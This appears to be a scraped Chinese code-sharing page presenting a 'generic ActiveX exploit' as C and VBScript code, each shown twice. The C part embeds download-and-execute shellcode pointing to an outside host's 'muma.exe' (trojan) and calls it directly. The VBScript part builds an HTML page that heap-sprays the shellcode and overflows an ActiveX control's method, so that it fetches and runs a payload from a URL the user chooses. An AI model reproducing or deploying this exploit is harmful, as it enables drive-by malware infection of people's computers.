ActiveX漏洞通用Exploit vbs修正版
程序员文章站
2022-04-10 08:06:09
c++代码 复制代码 代码如下:#include #include&n...
c++代码
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] =
"\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03"
"\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74"
"\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e"
"\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03"
"\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c"
"\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40"
"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c"
"\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec"
"\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f"
"\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb"
"\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83"
"\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\x7e\xd8\xe2\x73\xe8\x40\xff"
"\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff"
"http://fenggou.net/muma.exe";
int main()
{
void (* code)(); //把shellcode转换成一个参数为空,返回为空的函数指针,并调用
* (int *) & code = shellcode;
code();
}
vbs代码
exeurl = inputbox( "please input you want down&exec url:", "输入","http://jb51.net/muma.exe" )
if exeurl <> "" then
code="\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\x7e\xd8\xe2\x73\xe8\x40\xff\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff"&unicode(exeurl&chr(00)&chr(00))
function unicode(str1)
dim str,temp
str = ""
for i=1 to len(str1)
temp = hex(ascw(mid(str1,i,1)))
if len(temp) < 5 then temp = right("0000"&temp, 2)
str = str & "\x" & temp
next
unicode = str
end function
function replaceregex(str)
set regex=new regexp
regex.pattern="\\x(..)\\x(..)"
regex.ignorecase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end function
set fso=createobject("scripting.filesystemobject")
if fso.fileexists("jb51.htm") then
fso.deletefile "jb51.htm",true
end if
set files=fso.opentextfile("jb51.htm",8,true)
files.writeline "<html>"
files.writeline "<title>sina</title>"
files.writeline "<object classid=""clsid:8ef2a07c-6e69-4144-96aa-2247d892a73d"" id='target'></object>"
files.writeline "<body>"
files.writeline "<script language=""javascript"">"
files.writeline "var shellcode = unescape("""&replaceregex(code)&""");"
files.writeline "var bigblock = unescape(""%u9090%u9090"");"
files.writeline "var headersize = 20;"
files.writeline "var slackspace = headersize+shellcode.length;"
files.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"
files.writeline "fillblock = bigblock.substring(0, slackspace);"
files.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"
files.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"
files.writeline "memory = new array();"
files.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"
files.writeline "var buffer = '';"
files.writeline "while (buffer.length < 218) buffer+='\x0a\x0a\x0a\x0a';"
files.writeline "target.method1(buffer);"
files.writeline "</script>"
files.writeline "</body>"
files.writeline "</html>"
files.close
set fso=nothing
end if
复制代码 代码如下:
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] =
"\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03"
"\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74"
"\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e"
"\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03"
"\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c"
"\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40"
"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c"
"\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec"
"\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f"
"\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb"
"\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83"
"\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\x7e\xd8\xe2\x73\xe8\x40\xff"
"\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff"
"http://fenggou.net/muma.exe";
int main()
{
void (* code)(); //把shellcode转换成一个参数为空,返回为空的函数指针,并调用
* (int *) & code = shellcode;
code();
}
vbs代码
复制代码 代码如下:
exeurl = inputbox( "please input you want down&exec url:", "输入","http://jb51.net/muma.exe" )
if exeurl <> "" then
code="\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\x7e\xd8\xe2\x73\xe8\x40\xff\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff"&unicode(exeurl&chr(00)&chr(00))
function unicode(str1)
dim str,temp
str = ""
for i=1 to len(str1)
temp = hex(ascw(mid(str1,i,1)))
if len(temp) < 5 then temp = right("0000"&temp, 2)
str = str & "\x" & temp
next
unicode = str
end function
function replaceregex(str)
set regex=new regexp
regex.pattern="\\x(..)\\x(..)"
regex.ignorecase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end function
set fso=createobject("scripting.filesystemobject")
if fso.fileexists("jb51.htm") then
fso.deletefile "jb51.htm",true
end if
set files=fso.opentextfile("jb51.htm",8,true)
files.writeline "<html>"
files.writeline "<title>sina</title>"
files.writeline "<object classid=""clsid:8ef2a07c-6e69-4144-96aa-2247d892a73d"" id='target'></object>"
files.writeline "<body>"
files.writeline "<script language=""javascript"">"
files.writeline "var shellcode = unescape("""&replaceregex(code)&""");"
files.writeline "var bigblock = unescape(""%u9090%u9090"");"
files.writeline "var headersize = 20;"
files.writeline "var slackspace = headersize+shellcode.length;"
files.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"
files.writeline "fillblock = bigblock.substring(0, slackspace);"
files.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"
files.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"
files.writeline "memory = new array();"
files.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"
files.writeline "var buffer = '';"
files.writeline "while (buffer.length < 218) buffer+='\x0a\x0a\x0a\x0a';"
files.writeline "target.method1(buffer);"
files.writeline "</script>"
files.writeline "</body>"
files.writeline "</html>"
files.close
set fso=nothing
end if
上一篇: 用vbs发送带附件的邮件